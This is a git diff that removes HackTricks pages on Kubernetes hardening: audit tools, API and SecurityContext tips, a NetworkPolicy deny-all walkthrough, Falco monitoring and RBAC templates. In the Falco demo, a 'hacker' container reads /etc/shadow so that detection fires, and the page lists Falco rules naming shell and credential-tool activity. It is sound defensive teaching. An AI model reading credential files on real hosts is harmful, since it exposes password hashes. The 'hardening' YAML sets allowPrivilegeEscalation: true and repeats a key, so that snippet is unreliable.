- - -# Tools - -## Kube-bench - -The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\ -You can choose to: - -* run kube-bench from inside a container (sharing PID namespace with the host) -* run a container that installs kube-bench on the host, and then run kube-bench directly on the host -* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases), -* compile it from source. - -## Kubeaudit - -The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns. - -Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster: - -``` -kubeaudit all -``` - -This tool also has the argument `autofix` to **automatically fix detected issues.** - -## **Popeye** - -[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive _over_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity. - -## **Kicks** - -[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications - -## Checkov - -[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code. - -It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning. - -## **Monitoring with Falco** - -{% content-ref url="monitoring-with-falco.md" %} -[monitoring-with-falco.md](monitoring-with-falco.md) -{% endcontent-ref %} - -# Tips - -## Kubernetes PodSecurityContext and SecurityContext - -You can configure the **security context of the Pods** (with _PodSecurityContext_) and of the **containers** that are going to be run (with _SecurityContext_). For more information read: - -{% content-ref url="kubernetes-securitycontext-s.md" %} -[kubernetes-securitycontext-s.md](kubernetes-securitycontext-s.md) -{% endcontent-ref %} - -## Kubernetes API Hardening - -It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could be able to abuse it and damage in a lot of way the environment.\ -It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**. - -**Common Request process:**\ -User or K8s ServiceAccount –> Authentication –> Authorization –> Admission Control. - -**Tips**: - -* Close ports. -* Avoid Anonymous access. -* NodeRestriction; No access from specific nodes to the API. - * [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction) - * Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix. - * And also, allows kubelets to add/remove/update these labels and label prefixes. -* Ensure with labels the secure workload isolation. -* Avoid specific pods from API access. -* Avoid ApiServer exposure to the internet. -* Avoid unauthorized access RBAC. -* ApiServer port with firewall and IP whitelisting. - -## SecurityContext Hardening - -By default root user will be used when a Pod is started if no other user is specified. You can run your application inside a more secure context using a template similar to the following one: - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: security-context-demo -spec: - securityContext: - runAsUser: 1000 - runAsGroup: 3000 - fsGroup: 2000 - volumes: - - name: sec-ctx-vol - emptyDir: {} - containers: - - name: sec-ctx-demo - image: busybox - command: [ "sh", "-c", "sleep 1h" ] - securityContext: - runAsNonRoot: true - volumeMounts: - - name: sec-ctx-vol - mountPath: /data/demo - securityContext: - allowPrivilegeEscalation: true -``` - -* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) -* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) - -## Kubernetes NetworkPolicies - -{% content-ref url="kubernetes-networkpolicies.md" %} -[kubernetes-networkpolicies.md](kubernetes-networkpolicies.md) -{% endcontent-ref %} - -## General Hardening - -You should update your Kubernetes environment as frequently as necessary to have: - -* Dependencies up to date. -* Bug and security patches. - -[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch) - -**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):** - -* Upgrade the Master Node components following this sequence: - * etcd (all instances). - * kube-apiserver (all control plane hosts). - * kube-controller-manager. - * kube-scheduler. - * cloud controller manager, if you use one. -* Upgrade the Worker Node components such as kube-proxy, kubelet. - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md deleted file mode 100644 index e4290c932..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md +++ /dev/null @@ -1,158 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -**This tutorial was taken from** [**https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html**](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html) - -## Scenario Information - -This scenario is deploy a simple network security policy for Kubernetes resources to create security boundaries. - -* To get started with this scenario ensure you must be using a networking solution which supports `NetworkPolicy` - -## Scenario Solution - -* The below scenario is from [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes) - -If you want to control traffic flow at the IP address or port level (OSI layer 3 or 4), then you might consider using Kubernetes NetworkPolicies for particular applications in your cluster. NetworkPolicies are an application-centric construct which allow you to specify how a pod is allowed to communicate with various network "entities" (we use the word "entity" here to avoid overloading the more common terms such as "endpoints" and "services", which have specific Kubernetes connotations) over the network. - -The entities that a Pod can communicate with are identified through a combination of the following 3 identifiers - -1. Other pods that are allowed (exception: a pod cannot block access to itself) Namespaces that are allowed -2. IP blocks (exception: traffic to and from the node where a Pod is running is always allowed, regardless of the IP address of the Pod or the node) -3. When defining a pod- or namespace- based NetworkPolicy, you use a selector to specify what traffic is allowed to and from the Pod(s) that match the selector. - -Meanwhile, when IP based NetworkPolicies are created, we define policies based on IP blocks (CIDR ranges). - -* We will be creating DENY all traffic to an application - -> This NetworkPolicy will drop all traffic to pods of an application, selected using Pod Selectors. - -Use Cases: - -* It’s very common: To start whitelisting the traffic using Network Policies, first you need to blacklist the traffic using this policy. -* You want to run a Pod and want to prevent any other Pods communicating with it. -* You temporarily want to isolate traffic to a Service from other Pods. - -![Scenario 20 NSP](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-1.gif) - -### Example - -* Run a nginx Pod with labels `app=web` and expose it at port 80 - -```bash -kubectl run --image=nginx web --labels app=web --expose --port 80 -``` - -* Run a temporary Pod and make a request to `web` Service - -```bash -kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh -``` - -```bash -wget -qO- http://web -# You will see the below output -# -# -# -# ... -``` - -* It works, now save the following manifest to `web-deny-all.yaml`, then apply to the cluster - -```yaml -kind: NetworkPolicy -apiVersion: networking.k8s.io/v1 -metadata: - name: web-deny-all -spec: - podSelector: - matchLabels: - app: web - ingress: [] -``` - -```bash -kubectl apply -f web-deny-all.yaml -``` - -### Try it out - -* Run a test container again, and try to query `web` - -```bash -kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh -``` - -```bash -wget -qO- --timeout=2 http://web -# You will see the below output -# wget: download timed out -``` - -* Traffic dropped - -### [Remarks](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html#remarks) - -* In the manifest above, we target Pods with app=web label to policy the network. This manifest file is missing the spec.ingress field. Therefore it is not allowing any traffic into the Pod. -* If you create another NetworkPolicy that gives some Pods access to this application directly or indirectly, this NetworkPolicy will be obsolete. -* If there is at least one NetworkPolicy with a rule allowing the traffic, it means the traffic will be routed to the pod regardless of the policies blocking the traffic. - -### Cleanup - -```bash -kubectl delete pod web -kubectl delete service web -kubectl delete networkpolicy web-deny-all -``` - -* More referenecs and resources can be found at https://github.com/ahmetb/kubernetes-network-policy-recipes - -## Cilium Editor - Network Policy Editor - -A tool/framework to teach you how to create a network policy using the Editor. It explains basic network policy concepts and guides you through the steps needed to achieve the desired least-privilege security and zero-trust concepts. - -* **Navigate to the Cilium Editor** [**https://editor.cilium.io/**](https://editor.cilium.io) - -![Scenario 20 NSP Cilium](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-2.png) - -## Miscellaneous - -* [https://kubernetes.io/docs/concepts/services-networking/network-policies/](https://kubernetes.io/docs/concepts/services-networking/network-policies/) -* [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes) -* [https://editor.cilium.io/](https://editor.cilium.io) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md deleted file mode 100644 index dd7d6552d..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md +++ /dev/null @@ -1,86 +0,0 @@ -# Kubernetes SecurityContext(s) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## PodSecurityContext - -When specifying the security context of a Pod you can use several attributes. From a defensive security point of view you should consider: - -* To have **runASNonRoot** as **True** -* To configure **runAsUser** -* If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile** -* Do **NOT** give **privilege** **group** access via **runAsGroup** and **supplementaryGroups** - -|

fsGroup
integer

|

A special supplemental group that applies to all containers in a pod. Some volume types allow the Kubelet to change the ownership of that volume to be owned by the pod:
1. The owning GID will be the FSGroup
2. The setgid bit is set (new files created in the volume will be owned by FSGroup)
3. The permission bits are OR'd with rw-rw---- If unset, the Kubelet will not modify the ownership and permissions of any volume

| -| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -|

fsGroupChangePolicy
string

| This defines behavior of **changing ownership and permission of the volume** before being exposed inside Pod. | -|

runAsGroup
integer

| The **GID to run the entrypoint of the container process**. Uses runtime default if unset. May also be set in SecurityContext. | -|

runAsNonRoot
boolean

| Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. | -|

runAsUser
integer

| The **UID to run the entrypoint of the container process**. Defaults to user specified in image metadata if unspecified. | -|

seLinuxOptions
SELinuxOptions
More info about seLinux

| The **SELinux context to be applied to all containers**. If unspecified, the container runtime will allocate a random SELinux context for each container. | -|

seccompProfile
SeccompProfile
More info about Seccomp

| The **seccomp options to use by the containers** in this pod. | -|

supplementalGroups
integer array

| A list of **groups applied to the first process run in each container**, in addition to the container's primary GID. | -|

sysctls
Sysctl array
More info about sysctls

| Sysctls hold a list of **namespaced sysctls used for the pod**. Pods with unsupported sysctls (by the container runtime) might fail to launch. | -|

windowsOptions
WindowsSecurityContextOptions

| The Windows specific settings applied to all containers. If unspecified, the options within a container's SecurityContext will be used. | - -## SecurityContext - -This context is set inside the **containers definitions**. From a defensive security point of view you should consider: - -* **allowPrivilegeEscalation** to **False** -* Do not add sensitive **capabilities** (and remove the ones you don't need) -* **privileged** to **False** -* If possible, set **readOnlyFilesystem** as **True** -* Set **runAsNonRoot** to **True** and set a **runAsUser** -* If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile** -* Do **NOT** give **privilege** **group** access via **runAsGroup.** - -Note that the attributes set in **both SecurityContext and PodSecurityContext**, the value specified in **SecurityContext** takes **precedence**. - -|

allowPrivilegeEscalation
boolean

| **AllowPrivilegeEscalation** controls whether a process can **gain more privileges** than its parent process. This bool directly controls if the no\_new\_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is run as **Privileged** or has **CAP\_SYS\_ADMIN** | -| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -|

capabilities
Capabilities
More info about Capabilities

| The **capabilities to add/drop when running containers**. Defaults to the default set of capabilities. | -|

privileged
boolean

| Run container in privileged mode. Processes in privileged containers are essentially **equivalent to root on the host**. Defaults to false. | -|

procMount
string

| procMount denotes the **type of proc mount to use for the containers**. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. | -|

readOnlyRootFilesystem
boolean

| Whether this **container has a read-only root filesystem**. Default is false. | -|

runAsGroup
integer

| The **GID to run the entrypoint** of the container process. Uses runtime default if unset. | -|

runAsNonRoot
boolean

| Indicates that the container must **run as a non-root user**. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. | -|

runAsUser
integer

| The **UID to run the entrypoint** of the container process. Defaults to user specified in image metadata if unspecified. | -|

seLinuxOptions
SELinuxOptions
More info about seLinux

| The **SELinux context to be applied to the container**. If unspecified, the container runtime will allocate a random SELinux context for each container. | -|

seccompProfile
SeccompProfile

| The **seccomp options** to use by this container. | -|

windowsOptions
WindowsSecurityContextOptions

| The **Windows specific settings** applied to all containers. | - -## References - -* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core) -* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md deleted file mode 100644 index d052640b2..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md +++ /dev/null @@ -1,107 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -This tutorial was taken from [https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-information](https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-information) - -## Scenario Information - -This scenario is deploy runtime security monitoring & detection for containers and kubernetes resources. - -* To get started with this scenario you can deploy the below helm chart with version 3 - -> NOTE: Make sure you run the follwing deployment using Helm with v3. - -```bash -helm repo add falcosecurity https://falcosecurity.github.io/charts -helm repo update -helm install falco falcosecurity/falco -``` - -![Scenario 18 helm falco setup](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-1.png) - -## [Scenario Solution](https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-solution) - -> `Falco`, the cloud-native runtime security project, is the de facto Kubernetes threat detection engine. Falco was created by Sysdig in 2016 and is the first runtime security project to join CNCF as an incubation-level project. Falco detects unexpected application behavior and alerts on threats at runtime. - -Falco uses system calls to secure and monitor a system, by: - -* Parsing the Linux system calls from the kernel at runtime -* Asserting the stream against a powerful rules engine -* Alerting when a rule is violated - -Falco ships with a default set of rules that check the kernel for unusual behavior such as: - -* Privilege escalation using privileged containers -* Namespace changes using tools like `setns` -* Read/Writes to well-known directories such as /etc, /usr/bin, /usr/sbin, etc -* Creating symlinks -* Ownership and Mode changes -* Unexpected network connections or socket mutations -* Spawned processes using execve -* Executing shell binaries such as sh, bash, csh, zsh, etc -* Executing SSH binaries such as ssh, scp, sftp, etc -* Mutating Linux coreutils executables -* Mutating login binaries -* Mutating shadowutil or passwd executables such as shadowconfig, pwck, chpasswd, getpasswd, change, useradd, etc, and others. -* Get more details about the falco deployment - -```bash -kubectl get pods --selector app=falco -``` - -![Scenario 18 falco get pods](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-2.png) - -* Manually obtaining the logs from the falco systems - -```bash -kubectl logs -f -l app=falco -``` - -* Now, let's spin up a hacker container and read senstive file and see if that detects by Falco - -```bash -kubectl run --rm --restart=Never -it --image=madhuakula/hacker-container -- bash -``` - -* Read the sensitive file - -```bash -cat /etc/shadow -``` - -![Scenario 18 falco detect /etc/shadow](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-3.png) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md b/pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md deleted file mode 100644 index d2d8dc394..000000000 --- a/pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md +++ /dev/null @@ -1,206 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Role-Based Access Control (RBAC) - -Kubernetes has an **authorization module named Role-Based Access Control** ([**RBAC**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)) that helps to set utilization permissions to the API server. - -RBAC’s permission model is built from **three individual parts**: - -1. **Role\ClusterRole ­–** The actual permission. It contains _**rules**_ that represent a set of permissions. Each rule contains [resources](https://kubernetes.io/docs/reference/kubectl/overview/#resource-types) and [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb). The verb is the action that will apply on the resource. -2. **Subject (User, Group or ServiceAccount) –** The object that will receive the permissions. -3. **RoleBinding\ClusterRoleBinding –** The connection between Role\ClusterRole and the subject. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebiding\_serviceaccount\_and\_role-1024x551.png) - -The difference between β€œ**Roles**” and β€œ**ClusterRoles**” is just where the role will be applied – a β€œ**Role**” will grant access to only **one** **specific** **namespace**, while a β€œ**ClusterRole**” can be used in **all namespaces** in the cluster. Moreover, **ClusterRoles** can also grant access to: - -* **cluster-scoped** resources (like nodes). -* **non-resource** endpoints (like /healthz). -* namespaced resources (like Pods), **across all namespaces**. - -From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. But to enable RBAC you can use something like: - -``` -kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options -``` - -# Templates - -In the template of a **Role** or a **ClusterRole** you will need to indicate the **name of the role**, the **namespace** (in roles) and then the **apiGroups**, **resources** and **verbs** of the role: - -* The **apiGroups** is an array that contains the different **API namespaces** that this rule applies to. For example, a Pod definition uses apiVersion: v1. _It can has values such as rbac.authorization.k8s.io or \[\*]_. -* The **resources** is an array that defines **which resources this rule applies to**. You can find all the resources with: `kubectl api-resources --namespaced=true` -* The **verbs** is an array that contains the **allowed verbs**. The verb in Kubernetes defines the **type of action** you need to apply to the resource. For example, the list verb is used against collections while "get" is used against a single resource. - -## Rules Verbs - -(_This info was taken from_ [_**here**_](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb)) - -| HTTP verb | request verb | -| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| POST | create | -| GET, HEAD | get (for individual resources), list (for collections, including full object content), watch (for watching an individual resource or collection of resources) | -| PUT | update | -| PATCH | patch | -| DELETE | delete (for individual resources), deletecollection (for collections) | - -Kubernetes sometimes checks authorization for additional permissions using specialized verbs. For example: - -* [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) - * `use` verb on `podsecuritypolicies` resources in the `policy` API group. -* [RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) - * `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group. -* [Authentication](https://kubernetes.io/docs/reference/access-authn-authz/authentication/) - * `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group. - -{% hint style="warning" %} -You can find **all the verbs that each resource support** executing `kubectl api-resources --sort-by name -o wide` -{% endhint %} - -## Examples - -{% code title="Role" %} -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -kind: Role -metadata: - namespace: defaultGreen - name: pod-and-pod-logs-reader -rules: -- apiGroups: [""] - resources: ["pods", "pods/log"] - verbs: ["get", "list", "watch"] -``` -{% endcode %} - -{% code title="ClusterRole" %} -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - # "namespace" omitted since ClusterRoles are not namespaced - name: secret-reader -rules: -- apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "watch", "list"] -``` -{% endcode %} - -For example you can use a **ClusterRole** to allow a particular user to run: - -``` -kubectl get pods --all-namespaces -``` - -## **RoleBinding and ClusterRoleBinding** - -A **role binding** **grants the permissions defined in a role to a user or set of users**. It holds a list of subjects (users, groups, or service accounts), and a reference to the role being granted. A **RoleBinding** grants permissions within a specific **namespace** whereas a **ClusterRoleBinding** grants that access **cluster-wide**. - -{% code title="" %} -```yaml -piVersion: rbac.authorization.k8s.io/v1 -# This role binding allows "jane" to read pods in the "default" namespace. -# You need to already have a Role named "pod-reader" in that namespace. -kind: RoleBinding -metadata: - name: read-pods - namespace: default -subjects: -# You can specify more than one "subject" -- kind: User - name: jane # "name" is case sensitive - apiGroup: rbac.authorization.k8s.io -roleRef: - # "roleRef" specifies the binding to a Role / ClusterRole - kind: Role #this must be Role or ClusterRole - name: pod-reader # this must match the name of the Role or ClusterRole you wish to bind to - apiGroup: rbac.authorization.k8s.io -``` -{% endcode %} - -{% code title="ClusterRoleBinding" %} -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -# This cluster role binding allows anyone in the "manager" group to read secrets in any namespace. -kind: 